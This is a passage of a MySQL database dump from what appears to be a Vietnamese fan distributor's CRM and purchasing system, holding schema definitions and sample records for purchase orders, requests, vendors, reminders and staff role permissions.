  `item_code` varchar(100) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `unit_id` int(11) DEFAULT NULL,
  `unit_price` decimal(15,2) DEFAULT NULL,
  `quantity` decimal(15,2) DEFAULT NULL,
  `into_money` decimal(15,2) DEFAULT NULL,
  `tax` text DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT NULL,
  `discount_money` decimal(15,2) DEFAULT NULL,
  `total_money` decimal(15,2) DEFAULT NULL,
  `tax_value` decimal(15,2) DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `item_name` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_invoice_payment`
--

CREATE TABLE `tblpur_invoice_payment` (
  `id` int(10) UNSIGNED NOT NULL,
  `pur_invoice` int(11) NOT NULL,
  `amount` decimal(15,2) NOT NULL,
  `paymentmode` longtext DEFAULT NULL,
  `date` date NOT NULL,
  `daterecorded` datetime NOT NULL,
  `note` text NOT NULL,
  `transactionid` mediumtext DEFAULT NULL,
  `approval_status` int(11) DEFAULT NULL,
  `requester` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_orders`
--

CREATE TABLE `tblpur_orders` (
  `id` int(10) UNSIGNED NOT NULL,
  `pur_order_name` varchar(100) NOT NULL,
  `vendor` int(11) NOT NULL,
  `estimate` int(11) NOT NULL,
  `pur_order_number` varchar(30) NOT NULL,
  `order_date` date NOT NULL,
  `status` int(11) NOT NULL DEFAULT 1,
  `approve_status` int(11) NOT NULL DEFAULT 1,
  `datecreated` datetime NOT NULL,
  `days_owed` int(11) NOT NULL,
  `delivery_date` date DEFAULT NULL,
  `subtotal` decimal(15,2) NOT NULL,
  `total_tax` decimal(15,2) NOT NULL,
  `total` decimal(15,2) NOT NULL,
  `addedfrom` int(11) NOT NULL,
  `vendornote` text DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `discount_type` varchar(30) DEFAULT NULL,
  `buyer` int(11) NOT NULL DEFAULT 0,
  `status_goods` int(11) NOT NULL DEFAULT 0,
  `number` int(11) DEFAULT NULL,
  `expense_convert` int(11) DEFAULT 0,
  `hash` varchar(32) DEFAULT NULL,
  `clients` text DEFAULT NULL,
  `delivery_status` int(11) DEFAULT 0,
  `type` text DEFAULT NULL,
  `project` int(11) DEFAULT NULL,
  `pur_request` int(11) DEFAULT NULL,
  `department` int(11) DEFAULT NULL,
  `tax_order_rate` decimal(15,2) DEFAULT NULL,
  `tax_order_amount` decimal(15,2) DEFAULT NULL,
  `sale_invoice` int(11) DEFAULT NULL,
  `currency` int(11) DEFAULT 0,
  `order_status` varchar(30) DEFAULT NULL,
  `shipping_note` text DEFAULT NULL,
  `currency_rate` decimal(15,6) DEFAULT NULL,
  `from_currency` varchar(20) DEFAULT NULL,
  `to_currency` varchar(20) DEFAULT NULL,
  `shipping_fee` decimal(15,2) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblpur_orders`
--

INSERT INTO `tblpur_orders` (`id`, `pur_order_name`, `vendor`, `estimate`, `pur_order_number`, `order_date`, `status`, `approve_status`, `datecreated`, `days_owed`, `delivery_date`, `subtotal`, `total_tax`, `total`, `addedfrom`, `vendornote`, `terms`, `discount_percent`, `discount_total`, `discount_type`, `buyer`, `status_goods`, `number`, `expense_convert`, `hash`, `clients`, `delivery_status`, `type`, `project`, `pur_request`, `department`, `tax_order_rate`, `tax_order_amount`, `sale_invoice`, `currency`, `order_status`, `shipping_note`, `currency_rate`, `from_currency`, `to_currency`, `shipping_fee`) VALUES
(1, 'PS1-3m', 3, 0, '#PO-00001', '2023-05-11', 1, 2, '2023-05-11 12:24:47', 0, '2023-05-11', 375000000.00, 37500000.00, 412500000.00, 1, '', '', 0.00, 0.00, NULL, 1, 1, 1, 0, '5aba781febf80bccf0f0d7e0da85e524', NULL, 1, '', 0, 1, 0, NULL, NULL, 0, 3, 'confirmed', NULL, 1.000000, '3', '3', 0.00);

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_order_detail`
--

CREATE TABLE `tblpur_order_detail` (
  `id` int(11) NOT NULL,
  `pur_order` int(11) NOT NULL,
  `item_code` varchar(100) NOT NULL,
  `description` text DEFAULT NULL,
  `unit_id` int(11) DEFAULT NULL,
  `unit_price` decimal(15,2) DEFAULT NULL,
  `quantity` decimal(15,2) NOT NULL,
  `into_money` decimal(15,2) DEFAULT NULL,
  `tax` text DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `discount_%` decimal(15,2) DEFAULT NULL,
  `discount_money` decimal(15,2) DEFAULT NULL,
  `total_money` decimal(15,2) DEFAULT NULL,
  `wh_quantity_received` varchar(200) DEFAULT NULL,
  `tax_value` decimal(15,2) DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_name` text DEFAULT NULL,
  `item_name` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblpur_order_detail`
--

INSERT INTO `tblpur_order_detail` (`id`, `pur_order`, `item_code`, `description`, `unit_id`, `unit_price`, `quantity`, `into_money`, `tax`, `total`, `discount_%`, `discount_money`, `total_money`, `wh_quantity_received`, `tax_value`, `tax_rate`, `tax_name`, `item_name`) VALUES
(1, 1, '1812', '', 0, 25000000.00, 15.00, 375000000.00, '1', 412500000.00, 0.00, 0.00, 412500000.00, NULL, 37500000.00, '10.00', 'Thuế GTGT 10%', 'HA072_Quạt trần cánh lớn Powerful S1 sải cánh 3m');

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_order_payment`
--

CREATE TABLE `tblpur_order_payment` (
  `id` int(10) UNSIGNED NOT NULL,
  `pur_order` int(11) NOT NULL,
  `amount` decimal(15,2) NOT NULL,
  `paymentmode` longtext DEFAULT NULL,
  `date` date NOT NULL,
  `daterecorded` datetime NOT NULL,
  `note` text NOT NULL,
  `transactionid` mediumtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_request`
--

CREATE TABLE `tblpur_request` (
  `id` int(11) NOT NULL,
  `pur_rq_code` varchar(45) NOT NULL,
  `pur_rq_name` varchar(100) NOT NULL,
  `rq_description` text DEFAULT NULL,
  `requester` int(11) NOT NULL,
  `department` int(11) NOT NULL,
  `request_date` datetime NOT NULL,
  `status` int(11) DEFAULT NULL,
  `status_goods` int(11) NOT NULL DEFAULT 0,
  `hash` varchar(32) DEFAULT NULL,
  `type` text DEFAULT NULL,
  `project` int(11) DEFAULT NULL,
  `number` int(11) DEFAULT NULL,
  `from_items` int(11) DEFAULT 1,
  `subtotal` decimal(15,2) DEFAULT NULL,
  `total_tax` decimal(15,2) DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `sale_invoice` int(11) DEFAULT NULL,
  `compare_note` text DEFAULT NULL,
  `send_to_vendors` text DEFAULT NULL,
  `currency` int(11) DEFAULT 0,
  `currency_rate` decimal(15,6) DEFAULT NULL,
  `from_currency` varchar(20) DEFAULT NULL,
  `to_currency` varchar(20) DEFAULT NULL,
  `sale_estimate` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblpur_request`
--

INSERT INTO `tblpur_request` (`id`, `pur_rq_code`, `pur_rq_name`, `rq_description`, `requester`, `department`, `request_date`, `status`, `status_goods`, `hash`, `type`, `project`, `number`, `from_items`, `subtotal`, `total_tax`, `total`, `sale_invoice`, `compare_note`, `send_to_vendors`, `currency`, `currency_rate`, `from_currency`, `to_currency`, `sale_estimate`) VALUES
(1, '#PR-00001-2023-PHòNGTưVấNBáNHàNG', 'Nhập SUNON PS1 3m', '', 1, 2, '2023-05-11 12:00:07', 2, 0, '6b63b8cd86da23965b7bf114161503e8', '', 0, 1, 0, 375000000.00, 37500000.00, 412500000.00, 0, NULL, NULL, 3, 1.000000, '3', '3', 0),
(2, '#PR-00002-2023-PHòNGTưVấNBáNHàNG', 'Nhập SUNON PS10 24FT', '', 1, 2, '2023-05-22 09:11:54', 2, 0, '2af81ea31ee9174fbe107f578bd9e25e', '', 24, 2, 1, 1170000000.00, 117000000.00, 1287000000.00, 0, NULL, NULL, 3, 1.000000, '3', '3', 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_request_detail`
--

CREATE TABLE `tblpur_request_detail` (
  `prd_id` int(11) NOT NULL,
  `pur_request` int(11) NOT NULL,
  `item_code` varchar(100) NOT NULL,
  `unit_id` int(11) DEFAULT NULL,
  `unit_price` decimal(15,2) DEFAULT NULL,
  `quantity` decimal(15,2) NOT NULL,
  `into_money` decimal(15,2) DEFAULT NULL,
  `inventory_quantity` int(11) DEFAULT 0,
  `item_text` text DEFAULT NULL,
  `tax` text DEFAULT NULL,
  `tax_rate` text DEFAULT NULL,
  `tax_value` decimal(15,2) DEFAULT NULL,
  `total` decimal(15,2) DEFAULT NULL,
  `tax_name` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblpur_request_detail`
--

INSERT INTO `tblpur_request_detail` (`prd_id`, `pur_request`, `item_code`, `unit_id`, `unit_price`, `quantity`, `into_money`, `inventory_quantity`, `item_text`, `tax`, `tax_rate`, `tax_value`, `total`, `tax_name`) VALUES
(1, 1, '1812', NULL, 25000000.00, 15.00, 375000000.00, 0, 'HA072_Quạt trần cánh lớn Powerful S1 sải cánh 3m', '1', '10.00', 37500000.00, 412500000.00, 'Thuế GTGT 10%'),
(2, 2, '1799', NULL, 78000000.00, 15.00, 1170000000.00, 0, 'HA059_Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', '1', '10.00', 117000000.00, 1287000000.00, 'Thuế GTGT 10%');

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_unit`
--

CREATE TABLE `tblpur_unit` (
  `unit_id` int(11) NOT NULL,
  `unit_name` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_vendor`
--

CREATE TABLE `tblpur_vendor` (
  `userid` int(10) UNSIGNED NOT NULL,
  `company` varchar(200) DEFAULT NULL,
  `vat` varchar(200) DEFAULT NULL,
  `phonenumber` varchar(30) DEFAULT NULL,
  `country` int(11) NOT NULL DEFAULT 0,
  `city` varchar(100) DEFAULT NULL,
  `zip` varchar(15) DEFAULT NULL,
  `state` varchar(50) DEFAULT NULL,
  `address` text DEFAULT NULL,
  `website` varchar(150) DEFAULT NULL,
  `datecreated` datetime NOT NULL,
  `active` int(11) NOT NULL DEFAULT 1,
  `leadid` int(11) DEFAULT NULL,
  `billing_street` varchar(200) DEFAULT NULL,
  `billing_city` varchar(100) DEFAULT NULL,
  `billing_state` varchar(100) DEFAULT NULL,
  `billing_zip` varchar(100) DEFAULT NULL,
  `billing_country` int(11) DEFAULT 0,
  `shipping_street` varchar(200) DEFAULT NULL,
  `shipping_city` varchar(100) DEFAULT NULL,
  `shipping_state` varchar(100) DEFAULT NULL,
  `shipping_zip` varchar(100) DEFAULT NULL,
  `shipping_country` int(11) DEFAULT 0,
  `longitude` varchar(191) DEFAULT NULL,
  `latitude` varchar(191) DEFAULT NULL,
  `default_language` varchar(40) DEFAULT NULL,
  `default_currency` int(11) NOT NULL DEFAULT 0,
  `show_primary_contact` int(11) NOT NULL DEFAULT 0,
  `stripe_id` varchar(40) DEFAULT NULL,
  `registration_confirmed` int(11) NOT NULL DEFAULT 1,
  `addedfrom` int(11) NOT NULL DEFAULT 0,
  `category` text DEFAULT NULL,
  `bank_detail` text DEFAULT NULL,
  `payment_terms` text DEFAULT NULL,
  `vendor_code` varchar(100) DEFAULT NULL,
  `return_within_day` int(11) DEFAULT NULL,
  `return_order_fee` decimal(15,2) DEFAULT NULL,
  `return_policies` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblpur_vendor`
--

INSERT INTO `tblpur_vendor` (`userid`, `company`, `vat`, `phonenumber`, `country`, `city`, `zip`, `state`, `address`, `website`, `datecreated`, `active`, `leadid`, `billing_street`, `billing_city`, `billing_state`, `billing_zip`, `billing_country`, `shipping_street`, `shipping_city`, `shipping_state`, `shipping_zip`, `shipping_country`, `longitude`, `latitude`, `default_language`, `default_currency`, `show_primary_contact`, `stripe_id`, `registration_confirmed`, `addedfrom`, `category`, `bank_detail`, `payment_terms`, `vendor_code`, `return_within_day`, `return_order_fee`, `return_policies`) VALUES
(1, 'Big Ass Fans', NULL, '', 243, '', '', '', '', '', '2022-01-09 15:09:27', 1, NULL, '', '', '', '', 0, '', '', '', '', 0, NULL, NULL, '', 0, 0, NULL, 1, 1, NULL, '', '', '', NULL, NULL, NULL),
(2, '1Shine', NULL, '', 243, '', '', '', '', '', '2022-01-09 15:09:52', 1, NULL, '', '', '', '', 0, '', '', '', '', 0, NULL, NULL, '', 0, 0, NULL, 1, 1, NULL, '', '', '', NULL, NULL, NULL),
(3, 'SUNON', NULL, '', 243, '', '', '', '', '', '2022-01-09 15:10:06', 1, NULL, '', '', '', '', 0, '', '', '', '', 0, NULL, NULL, '', 0, 0, NULL, 1, 1, NULL, '', '', '', NULL, NULL, NULL),
(4, 'Vana', NULL, '', 243, '', '', '', '', '', '2022-01-09 15:10:21', 1, NULL, '', '', '', '', 0, '', '', '', '', 0, NULL, NULL, '', 0, 0, NULL, 1, 1, NULL, '', '', '', NULL, NULL, NULL),
(5, 'Mountain Air', NULL, '', 243, '', '', '', '', '', '2022-01-09 15:10:33', 1, NULL, '', '', '', '', 0, '', '', '', '', 0, NULL, NULL, '', 0, 0, NULL, 1, 1, NULL, '', '', '', NULL, NULL, NULL),
(6, 'Nhập hàng Cô Liên Cường', NULL, '', 243, '', '', '', '', '', '2022-04-27 09:38:37', 1, NULL, '', '', '', '', 0, '', '', '', '', 0, NULL, NULL, '', 3, 0, NULL, 1, 1, '1', 'Vietcombank - 0011004358926', 'Thanh toán trước tiền hàng - VC ra ga Hà Nội Miễn Phí', '', NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_vendor_admin`
--

CREATE TABLE `tblpur_vendor_admin` (
  `staff_id` int(11) NOT NULL,
  `vendor_id` int(11) NOT NULL,
  `date_assigned` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_vendor_cate`
--

CREATE TABLE `tblpur_vendor_cate` (
  `id` int(10) UNSIGNED NOT NULL,
  `category_name` varchar(255) DEFAULT NULL,
  `description` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblpur_vendor_cate`
--

INSERT INTO `tblpur_vendor_cate` (`id`, `category_name`, `description`) VALUES
(1, 'quạt mát', '');

-- --------------------------------------------------------

--
-- Table structure for table `tblpur_vendor_items`
--

CREATE TABLE `tblpur_vendor_items` (
  `id` int(10) UNSIGNED NOT NULL,
  `vendor` int(11) NOT NULL,
  `group_items` int(11) DEFAULT NULL,
  `items` int(11) NOT NULL,
  `add_from` int(11) DEFAULT NULL,
  `datecreate` date DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrelated_items`
--

CREATE TABLE `tblrelated_items` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(30) NOT NULL,
  `item_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblreminders`
--

CREATE TABLE `tblreminders` (
  `id` int(11) NOT NULL,
  `description` text DEFAULT NULL,
  `date` datetime NOT NULL,
  `isnotified` int(11) NOT NULL DEFAULT 0,
  `rel_id` int(11) NOT NULL,
  `staff` int(11) NOT NULL,
  `rel_type` varchar(40) NOT NULL,
  `notify_by_email` int(11) NOT NULL DEFAULT 1,
  `creator` int(11) NOT NULL,
  `customer` varchar(100) NOT NULL,
  `contact` varchar(100) NOT NULL,
  `assigned_to` varchar(40) NOT NULL,
  `repeat_every` varchar(40) NOT NULL,
  `cycles` varchar(11) NOT NULL,
  `recurring_type` varchar(20) NOT NULL,
  `recurring` int(11) NOT NULL,
  `is_recurring_from` int(11) NOT NULL,
  `custom_recurring` int(11) NOT NULL,
  `total_cycles` int(11) NOT NULL,
  `last_recurring_date` date DEFAULT NULL,
  `startdate` date DEFAULT NULL,
  `total_amount` int(11) DEFAULT NULL,
  `services` varchar(100) DEFAULT NULL,
  `duedate` date DEFAULT NULL,
  `is_complete` enum('1','0') NOT NULL,
  `notify_by_email_client` enum('2','1','0') NOT NULL DEFAULT '0',
  `notify_by_sms_client` enum('2','1','0') NOT NULL DEFAULT '0',
  `created_by_staff` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblreminders`
--

INSERT INTO `tblreminders` (`id`, `description`, `date`, `isnotified`, `rel_id`, `staff`, `rel_type`, `notify_by_email`, `creator`, `customer`, `contact`, `assigned_to`, `repeat_every`, `cycles`, `recurring_type`, `recurring`, `is_recurring_from`, `custom_recurring`, `total_cycles`, `last_recurring_date`, `startdate`, `total_amount`, `services`, `duedate`, `is_complete`, `notify_by_email_client`, `notify_by_sms_client`, `created_by_staff`) VALUES
(2, 'Hỏi lại báo giá - tiến độ dự án', '2022-06-04 13:50:00', 1, 55, 1, 'estimate', 1, 1, '', '', '', '', '', '', 0, 0, 0, 0, NULL, NULL, NULL, NULL, NULL, '1', '0', '0', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblreminder_activity`
--

CREATE TABLE `tblreminder_activity` (
  `id` int(11) NOT NULL,
  `reminder_id` int(11) NOT NULL,
  `description` mediumtext NOT NULL,
  `additional_data` text DEFAULT NULL,
  `date` datetime NOT NULL,
  `staffid` int(11) NOT NULL,
  `full_name` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblreminder_activity`
--

INSERT INTO `tblreminder_activity` (`id`, `reminder_id`, `description`, `additional_data`, `date`, `staffid`, `full_name`) VALUES
(1, 6, 'reminder_activity_created', 'a:1:{i:0;s:42:\"Bao duong bao hanh - Can ve sinh canh quat\";}', '2023-03-28 08:33:58', 1, 'Ho Gia Phat'),
(2, 6, 'reminder_activity_deleted', '', '2023-04-20 16:45:55', 1, 'Ho Gia Phat'),
(3, 8, 'reminder_activity_created', 'a:1:{i:0;s:95:\"Trả lại Motor Essence cho khách sạn New World & Resort Phú Quốc\r\nLiên hệ Mr.Đăng\";}', '2023-04-20 16:52:05', 1, 'Ho Gia Phat');

-- --------------------------------------------------------

--
-- Table structure for table `tblreminder_services`
--

CREATE TABLE `tblreminder_services` (
  `id` int(11) NOT NULL,
  `service_name` varchar(200) DEFAULT NULL,
  `service_amount` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblreminder_service_value`
--

CREATE TABLE `tblreminder_service_value` (
  `id` int(11) NOT NULL,
  `rem_id` int(11) DEFAULT NULL,
  `service_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblreminder_service_value`
--

INSERT INTO `tblreminder_service_value` (`id`, `rem_id`, `service_id`) VALUES
(1, 8, 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest`
--

CREATE TABLE `tblrequest` (
  `id` int(11) NOT NULL,
  `name` varchar(45) NOT NULL,
  `request_type_id` varchar(45) DEFAULT NULL,
  `date_create` datetime NOT NULL,
  `approval_deadline` datetime DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `status` varchar(45) DEFAULT NULL,
  `code` varchar(255) DEFAULT '',
  `description` mediumtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest_approval_details`
--

CREATE TABLE `tblrequest_approval_details` (
  `id` int(11) NOT NULL,
  `request_id` int(11) NOT NULL,
  `staffid` varchar(255) NOT NULL,
  `approve` varchar(45) NOT NULL,
  `note` text DEFAULT NULL,
  `date` datetime DEFAULT NULL,
  `approve_action` varchar(255) DEFAULT NULL,
  `reject_action` varchar(255) DEFAULT NULL,
  `approve_value` varchar(255) DEFAULT NULL,
  `reject_value` varchar(255) DEFAULT NULL,
  `staff_approve` int(11) DEFAULT 0,
  `action` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest_files`
--

CREATE TABLE `tblrequest_files` (
  `id` int(11) NOT NULL,
  `request_id` int(11) NOT NULL,
  `file_name` varchar(255) NOT NULL,
  `filetype` varchar(255) NOT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest_follow`
--

CREATE TABLE `tblrequest_follow` (
  `id` int(11) NOT NULL,
  `request_id` varchar(45) DEFAULT NULL,
  `staffid` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest_form`
--

CREATE TABLE `tblrequest_form` (
  `id` int(11) NOT NULL,
  `request_id` int(11) NOT NULL,
  `name` varchar(45) NOT NULL,
  `type` varchar(45) NOT NULL,
  `value` varchar(255) NOT NULL,
  `slug` varchar(45) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest_log`
--

CREATE TABLE `tblrequest_log` (
  `id` int(11) NOT NULL,
  `request_id` varchar(45) DEFAULT NULL,
  `staffid` int(11) NOT NULL,
  `date` datetime DEFAULT NULL,
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest_related`
--

CREATE TABLE `tblrequest_related` (
  `id` int(11) NOT NULL,
  `request_id` int(11) NOT NULL,
  `rel_type` varchar(45) NOT NULL,
  `rel_id` varchar(45) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest_type`
--

CREATE TABLE `tblrequest_type` (
  `id` int(11) NOT NULL,
  `name` varchar(45) NOT NULL,
  `maximum_number_day` varchar(45) DEFAULT NULL,
  `description` mediumtext DEFAULT NULL,
  `content` longtext DEFAULT NULL,
  `data_chart` longtext NOT NULL,
  `active` varchar(45) NOT NULL DEFAULT '1',
  `related_to` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest_type_form`
--

CREATE TABLE `tblrequest_type_form` (
  `id` int(11) NOT NULL,
  `request_type_id` int(11) NOT NULL,
  `name` varchar(45) NOT NULL,
  `type` varchar(45) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblrequest_type_workflow`
--

CREATE TABLE `tblrequest_type_workflow` (
  `id` int(11) NOT NULL,
  `request_type_id` varchar(45) NOT NULL,
  `staffid` varchar(255) NOT NULL,
  `approve_action` varchar(255) DEFAULT NULL,
  `reject_action` varchar(255) DEFAULT NULL,
  `approve_value` varchar(255) DEFAULT NULL,
  `reject_value` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblroles`
--

CREATE TABLE `tblroles` (
  `roleid` int(11) NOT NULL,
  `name` varchar(150) NOT NULL,
  `permissions` longtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblroles`
--

INSERT INTO `tblroles` (`roleid`, `name`, `permissions`) VALUES
(1, 'Employee', NULL),
(2, 'Bộ phận Bán Hàng', 'a:34:{s:17:\"bulk_pdf_exporter\";a:1:{i:0;s:4:\"view\";}s:9:\"contracts\";a:3:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:12:\"credit_notes\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:9:\"customers\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:15:\"email_templates\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:9:\"estimates\";a:4:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:8:\"expenses\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"invoices\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"items\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:14:\"knowledge_base\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"payments\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:8:\"projects\";a:6:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:17:\"create_milestones\";i:4;s:15:\"edit_milestones\";i:5;s:17:\"delete_milestones\";}s:9:\"proposals\";a:3:{i:0;s:8:\"view_own\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"staff\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:13:\"subscriptions\";a:2:{i:0;s:4:\"view\";i:1;s:4:\"edit\";}s:5:\"tasks\";a:7:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:14:\"edit_timesheet\";i:4;s:18:\"edit_own_timesheet\";i:5;s:16:\"delete_timesheet\";i:6;s:20:\"delete_own_timesheet\";}s:19:\"checklist_templates\";a:2:{i:0;s:6:\"create\";i:1;s:6:\"delete\";}s:16:\"estimate_request\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"leads\";a:2:{i:0;s:4:\"view\";i:1;s:6:\"delete\";}s:7:\"surveys\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:12:\"appointments\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:8:\"reminder\";a:2:{i:0;s:4:\"view\";i:1;s:6:\"create\";}s:9:\"warehouse\";a:1:{i:0;s:4:\"view\";}s:14:\"purchase_items\";a:1:{i:0;s:4:\"view\";}s:16:\"purchase_request\";a:1:{i:0;s:4:\"view\";}s:19:\"purchase_quotations\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:21:\"purchase_order_return\";a:1:{i:0;s:4:\"view\";}s:18:\"purchase_contracts\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:17:\"purchase_invoices\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:5:\"goals\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:12:\"ma_dashboard\";a:1:{i:0;s:4:\"view\";}s:13:\"ma_components\";a:4:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";i:3;s:6:\"delete\";}s:11:\"ma_channels\";a:3:{i:0;s:4:\"view\";i:1;s:6:\"create\";i:2;s:4:\"edit\";}s:9:\"ma_report\";a:1:{i:0;s:4:\"view\";}}'),
